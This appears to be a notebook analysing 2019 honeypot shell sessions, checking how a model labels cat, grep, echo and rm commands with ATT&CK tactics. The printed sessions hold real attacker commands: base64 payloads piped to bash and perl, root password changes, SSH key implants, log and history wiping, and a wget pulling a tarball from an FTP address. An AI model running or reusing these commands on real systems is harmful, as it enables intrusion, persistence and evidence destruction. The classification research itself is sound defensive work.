sembrano legit in caso ricontrolla dopo aver runnato le tue 

# Sessions
Those are the session used to comment on the first part of task 4  

# analysis of session :cat

In [20]:
# Cat
res_df[
    res_df["cat_pred"].apply(lambda x: len(x) > 0 and "Discovery" in x and "Execution" in x)
]

session  \
121     cat /proc/cpuinfo | grep name | wc -l ; echo -...   
185     cat /proc/cpuinfo | grep name | wc -l ; echo -...   
280     cat /proc/cpuinfo | grep name | wc -l ; echo -...   
430     cat /proc/cpuinfo | grep name | wc -l ; echo -...   
532     cat /proc/cpuinfo | grep name | wc -l ; echo -...   
...                                                   ...   
98088   cat /proc/cpuinfo | grep name | wc -l ; echo -...   
121763  cat /proc/cpuinfo | grep name | wc -l ; echo -...   
126015  cat /proc/cpuinfo | grep name | wc -l ; echo "...   
130500  cat /proc/cpuinfo | grep name | wc -l ; echo "...   
131633  cat /proc/cpuinfo | grep name | wc -l ; echo -...   

                   timestamps_statements    country_name  \
121     2019-09-01 19:02:12.555418+00:00           China   
185     2019-09-02 05:44:33.937028+00:00           Italy   
280     2019-09-02 20:16:04.792261+00:00           China   
430     2019-09-03 19:36:15.560653+00:00  United Kingdom   
532     2019-09-04 13:09:13.631772+00:00     Netherlands   
...                                  ...             ...   
98088   2019-12-01 19:11:30.180658+00:00          France   
121763  2019-12-07 17:34:19.763579+00:00  United Kingdom   
126015  2019-12-08 12:23:39.297704+00:00           China   
130500  2019-12-09 05:25:40.511744+00:00           China   
131633  2019-12-09 09:34:10.254330+00:00           China   

                               timestamp  \
121     2019-09-01 19:02:12.555418+00:00   
185     2019-09-02 05:44:33.937028+00:00   
280     2019-09-02 20:16:04.792261+00:00   
430     2019-09-03 19:36:15.560653+00:00   
532     2019-09-04 13:09:13.631772+00:00   
...                                  ...   
98088   2019-12-01 19:11:30.180658+00:00   
121763  2019-12-07 17:34:19.763579+00:00   
126015  2019-12-08 12:23:39.297704+00:00   
130500  2019-12-09 05:25:40.511744+00:00   
131633  2019-12-09 09:34:10.254330+00:00   

                                                    words  \
121     [cat, /proc/cpuinfo, |, grep, name, |, wc, -l,...   
185     [cat, /proc/cpuinfo, |, grep, name, |, wc, -l,...   
280     [cat, /proc/cpuinfo, |, grep, name, |, wc, -l,...   
430     [cat, /proc/cpuinfo, |, grep, name, |, wc, -l,...   
532     [cat, /proc/cpuinfo, |, grep, name, |, wc, -l,...   
...                                                   ...   
98088   [cat, /proc/cpuinfo, |, grep, name, |, wc, -l,...   
121763  [cat, /proc/cpuinfo, |, grep, name, |, wc, -l,...   
126015  [cat, /proc/cpuinfo, |, grep, name, |, wc, -l,...   
130500  [cat, /proc/cpuinfo, |, grep, name, |, wc, -l,...   
131633  [cat, /proc/cpuinfo, |, grep, name, |, wc, -l,...   

                                           predicted_tags  \
121     [Discovery, Discovery, Discovery, Discovery, D...   
185     [Discovery, Discovery, Discovery, Discovery, D...   
280     [Discovery, Discovery, Discovery, Discovery, D...   
430     [Discovery, Discovery, Discovery, Discovery, D...   
532     [Discovery, Discovery, Discovery, Discovery, D...   
...                                                   ...   
98088   [Discovery, Discovery, Discovery, Discovery, D...   
121763  [Discovery, Discovery, Discovery, Discovery, D...   
126015  [Discovery, Discovery, Discovery, Discovery, D...   
130500  [Discovery, Discovery, Discovery, Discovery, D...   
131633  [Discovery, Discovery, Discovery, Discovery, D...   

                                                   splits  \
121     [cat, /proc/cpuinfo, |, grep, name, |, wc, -l,...   
185     [cat, /proc/cpuinfo, |, grep, name, |, wc, -l,...   
280     [cat, /proc/cpuinfo, |, grep, name, |, wc, -l,...   
430     [cat, /proc/cpuinfo, |, grep, name, |, wc, -l,...   
532     [cat, /proc/cpuinfo, |, grep, name, |, wc, -l,...   
...                                                   ...   
98088   [cat, /proc/cpuinfo, |, grep, name, |, wc, -l,...   
121763  [cat, /proc/cpuinfo, |, grep, name, |, wc, -l,...   
126015  [cat, /proc/cpuinfo, |, grep, name, |, wc, -

In [23]:
# Cat
res_df[
    res_df["cat_pred"].apply(lambda x: len(x) > 0 and "Discovery" in x and "Execution" in x)
].iloc[0]["cat_pred"]

['Discovery', 'Discovery', 'Discovery', 'Discovery', 'Execution', 'Execution']

In [22]:
# Cat
res_df[
    res_df["cat_pred"].apply(lambda x: len(x) > 0 and "Discovery" in x and "Execution" in x)
].iloc[0]["session"]

'cat /proc/cpuinfo | grep name | wc -l ; echo -e "admin\\nvqckfz14Dsq3\\nvqckfz14 ; Enter new UNIX password: ; echo "admin\\nvqckfz14Dsq3\\nvqckfz14 ; echo "321" > /var/tmp/.var03522123 ; rm -rf /var/tmp/.var03522123 ; cat /var/tmp/.var03522123 | head -n 1 ; cat /proc/cpuinfo | grep name | head -n 1 | awk \'{print $4,$5,$6,$7,$8,$9;}\' ; free -m | grep Mem | awk \'{print $2 ,$3, $4, $5, $6, $7}\' ; ls -lh $(which ls) ; which ls ; crontab -l ; w ; uname -m ; cat /proc/cpuinfo | grep model | grep name | wc -l ; top ; uname ; uname -a ; lscpu | grep Model ; echo "admin admin" > /tmp/up.txt ; rm -rf /var/tmp/dota* ; cat /var/tmp/.systemcache436621 ; echo "1" > /var/tmp/.systemcache436621 ; cat /var/tmp/.systemcache436621 ; sleep 15s && cd /var/tmp; echo "IyEvYmluL2Jhc2gKY2QgL3RtcAkKc | base64 --decode | bash'

For this session we have that Cat is assigned both to Discovery and execution
- Discovery: we can notice that in this example the cat that are identified as Discovery all try to access /proc/cpuinfo that contains info about the CPU (processor, ids, chache size and so on, or trying yo access temporary file
- Execution: cat command that are associated to Execution might depend on the content of the temporary file, depending if the file is an executable or not 

# Grep analysis

In [24]:
# Cat
res_df[
    res_df["grep_pred"].apply(lambda x: len(x) > 0 and "Discovery" in x and "Persistence" in x)
]

session  \
15065   scp -t ~/g1z6qa8stkossi9oqgnbinabjp ; LC_ALL=C...   
16307   LC_ALL=C cat /etc/rc.local /etc/rc.d/rc.local ...   
75315   scp -t ~/jl3ih0wlzz9g1zc3cttoj0ac4h ; LC_ALL=C...   
84881   scp -t ~/pmr1ajxide0a16oltuj1pfmduc ; LC_ALL=C...   
110612  scp -t ~/8pxvcn4uy0p5hb8vr3618epwdd ; LC_ALL=C...   
110617  scp -t ~/722doaiugez06j6ym3yf4ojkvd ; LC_ALL=C...   

                   timestamps_statements   country_name  \
15065   2019-10-03 15:28:02.000159+00:00         Israel   
16307   2019-10-07 21:17:35.454703+00:00  United States   
75315   2019-11-16 18:18:59.098409+00:00  United States   
84881   2019-11-22 18:55:46.772679+00:00  United States   
110612  2019-12-05 07:09:16.227604+00:00     Seychelles   
110617  2019-12-05 07:10:46.031075+00:00     Seychelles   

                               timestamp  \
15065   2019-10-03 15:28:02.000159+00:00   
16307   2019-10-07 21:17:35.454703+00:00   
75315   2019-11-16 18:18:59.098409+00:00   
84881   2019-11-22 18:55:46.772679+00:00   
110612  2019-12-05 07:09:16.227604+00:00   
110617  2019-12-05 07:10:46.031075+00:00   

                                                    words  \
15065   [scp, -t, ~/g1z6qa8stkossi9oqgnbinabjp, ;, LC_...   
16307   [LC_ALL=C, cat, /etc/rc.local, /etc/rc.d/rc.lo...   
75315   [scp, -t, ~/jl3ih0wlzz9g1zc3cttoj0ac4h, ;, LC_...   
84881   [scp, -t, ~/pmr1ajxide0a16oltuj1pfmduc, ;, LC_...   
110612  [scp, -t, ~/8pxvcn4uy0p5hb8vr3618epwdd, ;, LC_...   
110617  [scp, -t, ~/722doaiugez06j6ym3yf4ojkvd, ;, LC_...   

                                           predicted_tags  \
15065   [Execution, Execution, Execution, Execution, E...   
16307   [Discovery, Discovery, Discovery, Discovery, D...   
75315   [Execution, Execution, Execution, Execution, E...   
84881   [Execution, Execution, Execution, Execution, E...   
110612  [Execution, Execution, Execution, Execution, E...   
110617  [Execution, Execution, Execution, Execution, E...   

                                                   splits cat_idx   grep_idx  \
15065   [scp, -t, ~/g1z6qa8stkossi9oqgnbinabjp, ;, LC_...    [35]  [94, 106]   
16307   [LC_ALL=C, cat, /etc/rc.local, /etc/rc.d/rc.lo...     [1]  [99, 111]   
75315   [scp, -t, ~/jl3ih0wlzz9g1zc3cttoj0ac4h, ;, LC_...      []  [90, 102]   
84881   [scp, -t, ~/pmr1ajxide0a16oltuj1pfmduc, ;, LC_...      []  [90, 102]   
110612  [scp, -t, ~/8pxvcn4uy0p5hb8vr3618epwdd, ;, LC_...      []  [90, 102]   
110617  [scp, -t, ~/722doaiugez06j6ym3yf4ojkvd, ;, LC_...      []  [90, 102]   

              echo_idx    rm_idx validation_status token_label_diff  \
15065   [39, 100, 112]   [8, 19]                OK             None   
16307   [44, 105, 117]  [17, 28]                OK             None   
75315    [35, 96, 108]   [8, 19]                OK             None   
84881    [35, 96, 108]   [8, 19]                OK             None   
110612   [35, 96, 108]   [8, 19]                OK             None   
110617   [35, 96, 108]   [8, 19]                OK             None   

           cat_pred                 grep_pred  \
15065   [Discovery]  [Discovery, Persistence]   
16307   [Discovery]  [Discovery, Persistence]   
75315            []  [Discovery, Persistence]   
84881            []  [Discovery, Persistence]   
110612           []  [Discovery, Persistence]   
110617           []  [Discovery, Persistence]   

                                    echo_pred                 rm_pred  
15065   [Discovery, Persistence, Persistence]  [Execution, Execution]  
16307   [Execution, Persistence, Persistence]  [Execution, Execution]  
75315   [Discovery, Persistence, Persistence]  [Execution, Execution]  
84881   [Discovery, Persistence, Persistence]  [Execution, Execution]  
110612  [Discovery, Persistence, Persistence]  [Execution, Execution]  
110617  [Discovery, Persistence, Persistence]  [Execution, Execution]

In [25]:
# Grep
res_df[
    res_df["grep_pred"].apply(lambda x: len(x) > 0 and "Discovery" in x and "Persistence" in x)
].iloc[0]["grep_pred"]

['Discovery', 'Persistence']

In [26]:
# Grep
res_df[
    res_df["grep_pred"].apply(lambda x: len(x) > 0 and "Discovery" in x and "Persistence" in x)
].iloc[0]["session"]

'scp -t ~/g1z6qa8stkossi9oqgnbinabjp ; LC_ALL=C ~/g1z6qa8stkossi9oqgnbinabjp ; LC_ALL=C rm -f ~/g1z6qa8stkossi9oqgnbinabjp ; LC_ALL=C chattr -i -a ~/.dhpcd ; LC_ALL=C rm -f ~/.dhpcd ; LC_ALL=C rmdir ~/.dhpcd ; scp -t ~/.dhpcd ; LC_ALL=C ~/.dhpcd ; LC_ALL=C cat /proc/cpuinfo ; LC_ALL=C echo ~ ; LC_ALL=C chattr -i -a /etc/shadow ; LC_ALL=C passwd ; LC_ALL=C passwd ; LC_ALL=C passwd test ; LC_ALL=C passwd test ; LC_ALL=C passwd oracle ; LC_ALL=C passwd oracle ; LC_ALL=C passwd test1 ; LC_ALL=C passwd test1 ; LC_ALL=C chattr +a /etc/shadow ; LC_ALL=C mkdir -p ~/.ssh ; LC_ALL=C chmod 700 ~/.ssh ; LC_ALL=C grep "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQ ~/.ssh/authorized_keys ; LC_ALL=C echo ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQ >>~/.ssh/authorized_keys ; LC_ALL=C grep "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQ ~/.ssh/authorized_keys ; LC_ALL=C echo ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQ >>~/.ssh/authorized_keys'

This Session is quite strange because in this case grep has 2 prediction in which the neighboors of words are similar but the prediction are similar 
- Discovery: The attacker is querying the system state — in this case, whether the SSH key is already installed. This qualifies as Discovery under the MITRE ATT&CK framework because it's gathering information about authentication configuration before making changes.
- Persitence: At this point in the script, the attack is already appending the SSH key to authorized_keys, enabling persistence via SSH access. Even though grep is reading, it's part of an idempotent step to ensure the key isn't appended multiple times. It might be considerd still as a discovery step done in support of a perstistence step

## Echo Analysis 

    Execution: 336437 (44.4%)
    Persistence: 214989 (28.4%)
    Discovery: 204576 (27.0%)
    Not Malicious Yet: 1694 (0.2%)
    Other: 190 (0.0%)
    Impact: 5 (0.0%)
    Defense Evasion: 1 (0.0%)


In [34]:
# Echo
res_df[
    res_df["echo_pred"].apply(lambda x: len(x) > 0 and "Discovery" in x and "Persistence" in x and "Execution" in x and "Not Malicious Yet" in x)
]

session  \
20811   cat /proc/cpuinfo | grep name | wc -l ; echo -...   
23917   cat /proc/cpuinfo | grep name | wc -l ; echo -...   
34750   cat /proc/cpuinfo | grep name | wc -l ; echo -...   
57161   cat /proc/cpuinfo | grep name | wc -l ; echo -...   
78448   cat /proc/cpuinfo | grep name | wc -l ; echo -...   
103699  cat /proc/cpuinfo | grep name | wc -l ; echo -...   
116703  cat /proc/cpuinfo | grep name | wc -l ; echo -...   
124210  cat /proc/cpuinfo | grep name | wc -l ; echo -...   
127717  cat /proc/cpuinfo | grep name | wc -l ; echo -...   
135908  cat /proc/cpuinfo | grep name | wc -l ; echo -...   
135944  cat /proc/cpuinfo | grep name | wc -l ; echo -...   
142891  cat /proc/cpuinfo | grep name | wc -l ; echo -...   
145349  cat /proc/cpuinfo | grep name | wc -l ; echo -...   
147777  cat /proc/cpuinfo | grep name | wc -l ; echo -...   
156556  cat /proc/cpuinfo | grep name | wc -l ; echo -...   
156702  cat /proc/cpuinfo | grep name | wc -l ; echo -...   
156738  cat /proc/cpuinfo | grep name | wc -l ; echo -...   
159610  cat /proc/cpuinfo | grep name | wc -l ; echo -...   
166753  cat /proc/cpuinfo | grep name | wc -l ; echo -...   
168112  cat /proc/cpuinfo | grep name | wc -l ; echo -...   
168210  cat /proc/cpuinfo | grep name | wc -l ; echo -...   

                   timestamps_statements       country_name  \
20811   2019-10-15 23:05:25.128097+00:00      United States   
23917   2019-10-17 05:45:07.430948+00:00              Nepal   
34750   2019-10-22 05:38:30.732472+00:00             France   
57161   2019-11-05 01:10:47.984504+00:00             Taiwan   
78448   2019-11-19 03:21:46.543500+00:00              China   
103699  2019-12-03 18:55:09.773000+00:00              China   
116703  2019-12-06 15:03:03.492856+00:00            Uruguay   
124210  2019-12-08 05:30:30.916196+00:00  Republic of Korea   
127717  2019-12-08 19:41:14.594791+00:00              India   
135908  2019-12-10 02:39:41.312105+00:00      United States   
135944  2019-12-10 02:48:25.013474+00:00             Canada   
142891  2019-12-11 19:30:37.852185+00:00               Iran   
145349  2019-12-12 13:33:20.297967+00:00             Poland   
147777  2019-12-13 08:09:34.168853+00:00              India   
156556  2019-12-17 12:41:01.616697+00:00      United States   
156702  2019-12-17 14:17:20.718378+00:00             France   
156738  2019-12-17 14:45:36.831284+00:00     United Kingdom   
159610  2019-12-18 18:45:11.540904+00:00           Pakistan   
166753  2019-12-21 18:42:40.081231+00:00     United Kingdom   
168112  2019-12-22 08:45:37.335545+00:00             Russia   
168210  2019-12-22 10:01:06.348254+00:00            Czechia   

                               timestamp  \
20811   2019-10-15 23:05:25.128097+00:00   
23917   2019-10-17 05:45:07.430948+00:00   
34750   2019-10-22 05:38:30.732472+00:00   
57161   2019-11-05 01:10:47.984504+00:00   
78448   2019-11-19 03:21:46.543500+00:00   
103699  2019-12-03 18:55:09.773000+00:00   
116703  2019-12-06 15:03:03.492856+00:00   
124210  2019-12-08 05:30:30.916196+00:00   
127717  2019-12-08 19:41:14.594791+00:00   
135908  2019-12-10 02:39:41.312105+00:00   
135944  2019-12-10 02:48:25.013474+00:00   
142891  2019-12-11 19:30:37.852185+00:00   
145349  2019-12-12 13:33:20.297967+00:00   
147777  2019-12-13 08:09:34.168853+00:00   
156556  2019-12-17 12:41:01.616697+00:00   
156702  2019-12-17 14:17:20.718378+00:00   
156738  2019-12-17 14:45:36.831284+00:00   
159610  2019-12-18 18:45:11.540904+00:00   
166753  2019-12-21 18:42:40.081231+00:00   
168112  2019-12-22 08:45:37.335545+00:00   
168210  2019-12-22 10:01:06.348254+00:00   

                                                    words  \
20811   [cat, /proc/cpuinfo, |, grep, name, |, wc, -l,...   
23917   [cat, /proc/cpuinfo, |, grep, name, |, wc, -l,...   
34750   [cat, /proc/cpuinfo, |, grep, name, |, wc, -l,...   
57161   [cat, /proc/cpuinfo, |, grep, name, |, wc, -l,...   
78448   [cat, /proc/cpuinfo, |, grep, name, |,

In [44]:
# Echo
res_df[
    res_df["echo_pred"].apply(lambda x: len(x) > 0 and "Discovery" in x and "Persistence" in x and "Execution" in x and "Not Malicious Yet" in x)
].iloc[5]["echo_pred"]

['Execution', 'Not Malicious Yet', 'Persistence', 'Discovery']

In [46]:
# Echo
res_df[
    res_df["echo_pred"].apply(lambda x: len(x) > 0 and "Discovery" in x and "Persistence" in x and "Execution" in x and "Not Malicious Yet" in x)
].iloc[5]["session"]

'cat /proc/cpuinfo | grep name | wc -l ; echo -e "printemps\\nzKoktZKWM6EL\\nzKok ; echo "printemps\\nzKoktZKWM6EL\\nzKok ; echo "321" > /var/tmp/.var03522123 ; rm -rf /var/tmp/.var03522123 ; cat /var/tmp/.var03522123 | head -n 1 ; cat /proc/cpuinfo | grep name | head -n 1 | awk \'{print $4,$5,$6,$7,$8,$9;}\' ; free -m | grep Mem | awk \'{print $2 ,$3, $4, $5, $6, $7}\' ; ls -lh $(which ls) ; crontab -l ; w ; uname -m ; cat /proc/cpuinfo | grep model | grep name | wc -l ; top ; uname ; uname -a ; lscpu | grep Model ; echo "admin printemps" > /tmp/up.txt ; rm -rf /var/tmp/dota*'

Looking at the echo command sequence, it seems we are dealing with a long, concatenated command (with improperly closed quotation marks or ticks), likely intended for execution in parts elsewhere. Here's a breakdown of the predictions:

    Execution: The first echo appears to output a sequence that could later be used for execution. Given that it might be piped or passed to another command in a larger context, classifying it as Execution is reasonable.

    Not Malicious Yet: This echo command outputs some data, but its destination or usage is not clear. Since it doesn’t directly indicate malicious behavior, the classification as Not Malicious Yet is acceptable, though ambiguous.

    Persistence: The third echo writes a value ("321") to a temporary file. This could be part of an attempt to stage a payload or maintain access. Since it involves writing to the filesystem, the label Persistence is appropriate.

    Discovery: The final echo writes what looks like credentials ("admin ascend") to a file. This is not about gathering system information but rather establishing persistence. Therefore, labeling it as Discovery is incorrect; Persistence would be more accurate.

In [47]:
# Echo
res_df[
    res_df["echo_pred"].apply(lambda x: len(x) > 0 and "Defense Evasion" in x)
]

session  \
159295  w ; sudo su ; ls -a ; rm -rf .ssh .profile .ba...   

                   timestamps_statements    country_name  \
159295  2019-12-18 15:28:06.934104+00:00  United Kingdom   

                               timestamp  \
159295  2019-12-18 15:28:06.934104+00:00   

                                                    words  \
159295  [w, ;, sudo, su, ;, ls, -a, ;, rm, -rf, .ssh, ...   

                                           predicted_tags  \
159295  [Persistence, Persistence, Persistence, Persis...   

                                                   splits cat_idx grep_idx  \
159295  [w, ;, sudo, su, ;, ls, -a, ;, rm, -rf, .ssh, ...    [83]       []   

         echo_idx                                   rm_idx validation_status  \
159295  [43, 102]  [8, 34, 37, 40, 47, 50, 67, 72, 79, 92]                OK   

       token_label_diff     cat_pred grep_pred  \
159295             None  [Discovery]        []   

                             echo_pred  \
159295  [Defense Evasion, Persistence]   

                                                  rm_pred  
159295  [Persistence, Defense Evasion, Defense Evasion...

In [52]:
# Echo
res_df[
    res_df["echo_pred"].apply(lambda x: len(x) > 0 and "Defense Evasion" in x)
].iloc[0]["session"]

'w ; sudo su ; ls -a ; rm -rf .ssh .profile .bashrc .bash_logout ; set +o history ; unset HISTFILE ; unset HISTSAVE ; unset SAVEFILE ; unset WATCH ; history -n ; rm -rf /var/log/wtmp ;rm -rf /var/log/lastlog ;rm -rf /var/log/secure ;echo done...;rm -rf /var/log/xferlog ;rm -rf /var/log/messages ;rm -rf /var/run/utmp ;touch /var/run/utmp ;touch /var/log/messages ;touch /var/log/wtmp ;touch /var/log/messages ;touch /var/log/xferlog ;touch /var/log/secure ;touch /var/log/lastlog ;rm -rf /var/log/maillog ;touch /var/log/maillog ;rm -rf /root/.bash_history ;touch /root/.bash_history ;history -r ;rm -rf *.log ; cat /proc/cpuinfo ; ps x|grep stratum ; lscpu ; rm -rf .ssh ; mkdir .ssh ; cd .ssh ; echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAIBbHn rsa-key-20131125" >> authorized_keys ; chmod 700 ~/.ssh;chmod 600 ~/.ssh/authorized_keys ; passwd ; password ; cd /var/tmp ; ls -a ; kill -9 -1'

In [53]:
# Echo
res_df[
    res_df["echo_pred"].apply(lambda x: len(x) > 0 and "Defense Evasion" in x)
].iloc[0]["echo_pred"]

['Defense Evasion', 'Persistence']

- Defense Evasion: Rather than letting the script spit out dozens of file-removal messages (e.g. removed ‘/var/log/secure’, etc.), the attacker prints a single, innocuous “done…” message. This is a way to reduce noise output and making the victim that everything is ok

In [50]:
# Echo
res_df[
    res_df["echo_pred"].apply(lambda x: len(x) > 0  and "Impact" in x)
]

session  \
67932   cat /proc/cpuinfo | grep name | wc -l ; cat /p...   
68229   cat /proc/cpuinfo | grep name | wc -l ; cat /p...   
153831  cat /proc/cpuinfo | grep name | wc -l ; echo -...   

                   timestamps_statements country_name  \
67932   2019-11-12 03:22:58.016214+00:00        China   
68229   2019-11-12 07:52:25.044706+00:00        China   
153831  2019-12-16 10:11:20.817141+00:00    Indonesia   

                               timestamp  \
67932   2019-11-12 03:22:58.016214+00:00   
68229   2019-11-12 07:52:25.044706+00:00   
153831  2019-12-16 10:11:20.817141+00:00   

                                                    words  \
67932   [cat, /proc/cpuinfo, |, grep, name, |, wc, -l,...   
68229   [cat, /proc/cpuinfo, |, grep, name, |, wc, -l,...   
153831  [cat, /proc/cpuinfo, |, grep, name, |, wc, -l,...   

                                           predicted_tags  \
67932   [Discovery, Discovery, Discovery, Discovery, D...   
68229   [Discovery, Discovery, Discovery, Discovery, D...   
153831  [Discovery, Discovery, Discovery, Discovery, D...   

                                                   splits  \
67932   [cat, /proc/cpuinfo, |, grep, name, |, wc, -l,...   
68229   [cat, /proc/cpuinfo, |, grep, name, |, wc, -l,...   
153831  [cat, /proc/cpuinfo, |, grep, name, |, wc, -l,...   

                                 cat_idx  \
67932   [0, 9, 50, 57, 64, 78, 148, 160]   
68229   [0, 9, 50, 57, 64, 78, 148, 160]   
153831                   [0, 25, 32, 74]   

                                                 grep_idx  \
67932   [3, 12, 67, 81, 95, 110, 151, 154, 163, 166, 1...   
68229   [3, 12, 67, 81, 95, 110, 151, 154, 163, 166, 1...   
153831                            [3, 35, 49, 77, 80, 95]   

                                  echo_idx              rm_idx  \
67932   [18, 22, 26, 29, 32, 37, 196, 202]  [42, 46, 208, 212]   
68229   [18, 22, 26, 29, 32, 37, 196, 202]  [42, 46, 208, 212]   
153831                     [9, 13, 16, 98]           [21, 104]   

       validation_status token_label_diff  \
67932                 OK             None   
68229                 OK             None   
153831                OK             None   

                                                 cat_pred  \
67932   [Discovery, Discovery, Discovery, Discovery, D...   
68229   [Discovery, Discovery, Discovery, Discovery, D...   
153831       [Discovery, Discovery, Discovery, Discovery]   

                                                grep_pred  \
67932   [Discovery, Discovery, Discovery, Discovery, D...   
68229   [Discovery, Discovery, Discovery, Discovery, D...   
153831  [Discovery, Discovery, Discovery, Discovery, D...   

                                                echo_pred  \
67932   [Not Malicious Yet, Not Malicious Yet, Not Mal...   
68229   [Execution, Execution, Execution, Execution, E...   
153831    [Persistence, Persistence, Persistence, Impact]   

                                                  rm_pred  
67932   [Discovery, Discovery, Defense Evasion, Defens...  
68229   [Discovery, Discovery, Defense Evasion, Defens...  
153831                       [Discovery, Defense Evasion]

In [94]:
# Echo
res_df[
    res_df["echo_pred"].apply(lambda x: len(x) > 0  and "Impact" in x)
].iloc[2]["session"]

'cat /proc/cpuinfo | grep name | wc -l ; echo -e "logout\\nOpZAboBBbFCB\\nOpZAboB ; echo "logout\\nOpZAboBBbFCB\\nOpZAboB ; echo "321" > /var/tmp/.var03522123 ; rm -rf /var/tmp/.var03522123 ; cat /var/tmp/.var03522123 | head -n 1 ; cat /proc/cpuinfo | grep name | head -n 1 | awk \'{print $4,$5,$6,$7,$8,$9;}\' ; free -m | grep Mem | awk \'{print $2 ,$3, $4, $5, $6, $7}\' ; ls -lh $(which ls) ; crontab -l ; w ; uname -m ; cat /proc/cpuinfo | grep model | grep name | wc -l ; top ; uname ; uname -a ; lscpu | grep Model ; echo "admin logout" > /tmp/up.txt ; rm -rf /var/tmp/dota*'

In [93]:
# Echo
res_df[
    res_df["echo_pred"].apply(lambda x: len(x) > 0  and "Impact" in x)
].iloc[2]["echo_pred"]

['Persistence', 'Persistence', 'Persistence', 'Impact']

- Impact:

In [95]:
# Echo
res_df[
    res_df["echo_pred"].apply(lambda x: len(x) > 0  and "Other" in x)
].iloc[2]["session"]

'cd /tmp || /var/tmp || /dev/shm; echo "ZXZhbCB1bnBhY2sgdT0+cXtfIkZVW | base64 --decode | perl ; rm -rf /var/tmp/dota* ; sleep 15s && cd /var/tmp; echo "IyEvYmluL2Jhc2gKY2QgL3RtcAkKc | base64 --decode | bash ; cat /proc/cpuinfo | grep name | wc -l ; echo "root:T5NsRMZCOGNl"|chpasswd|b ; echo "321" > /var/tmp/.var03522123 ; rm -rf /var/tmp/.var03522123 ; cat /var/tmp/.var03522123 | head -n 1 ; cat /proc/cpuinfo | grep name | head -n 1 | awk \'{print $4,$5,$6,$7,$8,$9;}\' ; free -m | grep Mem | awk \'{print $2 ,$3, $4, $5, $6, $7}\' ; ls -lh $(which ls) ; which ls ; crontab -l ; w ; uname -m ; cat /proc/cpuinfo | grep model | grep name | wc -l ; top ; uname ; uname -a ; lscpu | grep Model'

In [97]:
# Echo
res_df[
    res_df["echo_pred"].apply(lambda x: len(x) > 0  and "Other" in x)
].iloc[2]["echo_pred"]

['Other', 'Execution', 'Discovery', 'Discovery']

- Other: Loking at the echo it seems like we are passing a base 64 encoded string trough a pipe, that will be used by perl, so it could be considered as an execution, So this could be considered as a wrong influenced that is probalby influenced by the surrounding words

# Rm Analysis 

    Discovery: 257772 (75.2%)
    Execution: 58020 (16.9%)
    Defense Evasion: 19496 (5.7%)
    Persistence: 7387 (2.2%)


In [104]:
# Echo
res_df[
    res_df["rm_pred"].apply(lambda x: len(x) > 0  and "Discovery" in x and "Execution" in x and "Persistence" in x and "Defense Evasion" in x)
].iloc[0]["rm_pred"]

['Persistence',
 'Defense Evasion',
 'Discovery',
 'Discovery',
 'Discovery',
 'Discovery',
 'Discovery',
 'Discovery',
 'Discovery',
 'Persistence',
 'Execution']

In [103]:
# Echo
res_df[
    res_df["rm_pred"].apply(lambda x: len(x) > 0  and "Discovery" in x and "Execution" in x and "Persistence" in x and "Defense Evasion" in x)
].iloc[0]["session"]

'w ; ls -a ; rm -rf .dhpcd .profile .bash_logout .bashrc .ssh ; set +o history ; unset HISTFILE ; unset HISTSAVE ; unset SAVEFILE ; unset WATCH ; history -n ; rm -rf /var/log/wtmp ;rm -rf /var/log/lastlog ;rm -rf /var/log/secure ;echo done...;rm -rf /var/log/xferlog ;rm -rf /var/log/messages ;rm -rf /var/run/utmp ;touch /var/run/utmp ;touch /var/log/messages ;touch /var/log/wtmp ;touch /var/log/messages ;touch /var/log/xferlog ;touch /var/log/secure ;touch /var/log/lastlog ;rm -rf /var/log/maillog ;touch /var/log/maillog ;rm -rf /root/.bash_history ;touch /root/.bash_history ;history -r ;rm -rf *.log ; cat /proc/cpuinfo ; ps x|grep stratum ; lscpu ; rm -rf .ssh ; mkdir .ssh ; cd .ssh ; echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAIBbHn rsa-key-20131125" >> authorized_keys ; chmod 700 ~/.ssh;chmod 600 ~/.ssh/authorized_keys ; wget -q ftp://web1:12345@95.110.228.14 ; tar xvf has-CruD-5.1.tgz ; cd .systemd-private-service ; rm -rf has-CruD-5.1.tgz ; ls -a ; wget -q ftp://web1:12345@95.110.228.1